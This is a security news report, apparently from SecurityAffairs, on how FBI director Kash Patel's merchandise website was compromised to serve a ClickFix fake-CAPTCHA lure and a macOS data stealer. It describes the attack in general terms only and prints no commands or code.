Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

FBI director Kash Patel’s brand website taken offline after malware reports

FBI director site went offline after a hack used a fake Cloudflare page to trick users into running a ClickFix attack that installed malware. The merchandise website of FBI director Kash Patel (basedapparel[.]com) was taken offline on Friday after reports that it had been compromised by hackers using it to spread malware. The malware was […]

FBI director

FBI director site went offline after a hack used a fake Cloudflare page to trick users into running a ClickFix attack that installed malware.

The merchandise website of FBI director Kash Patel (basedapparel[.]com) was taken offline on Friday after reports that it had been compromised by hackers using it to spread malware. The malware was discovered on Thursday by “big time nerd” user known as “debbie.”

Visitors were instructed to copy a code from the website and paste it into their computer’s terminal, a social engineering method known as a ClickFix attack. Once executed, the Mac-specific code would download and install malware on the device.

A ClickFix attack is a social engineering technique that manipulates users into running malicious commands themselves, typically by posing as a fix for a problem or verification step, ultimately leading to malware installation or system compromise.

“A website that sells merchandise related to FBI Director Kash Patel went offline Friday after a hack apparently tricked visitors into downloading malware.” reports the website Straight Arrow News. “Visitors were then prompted to copy a code from the website and paste it into the terminal on their computers, a social engineering technique known as a ClickFix attack. When entered, the code, designed specifically for Mac computers, would download and install malware onto the user’s devices.”

At this time, the site is still offline.

The researcher who goes online with the X handler WifiRumHam analyzed the compromised website. The e-store was using WordPress plug-in WooCommerce running a multi-part malware attack. A malicious plugin running on the site both steals payment data and targets macOS users with a fake Cloudflare CAPTCHA (“ClickFix”) that tricks them into running hidden malicious commands.

If executed, the commands download a script-based macOS stealer that avoids normal security protections and can steal browser data, passwords, and cryptocurrency wallet information. It also targets many popular browsers and wallet apps, collects the data, compresses it, and sends it to a remote server before deleting itself.

The campaign appears to be widespread, with similar infections seen across many websites.

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, FBI director)

Follow me on Twitter: @securityaffairs and Facebook and Mastodon

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)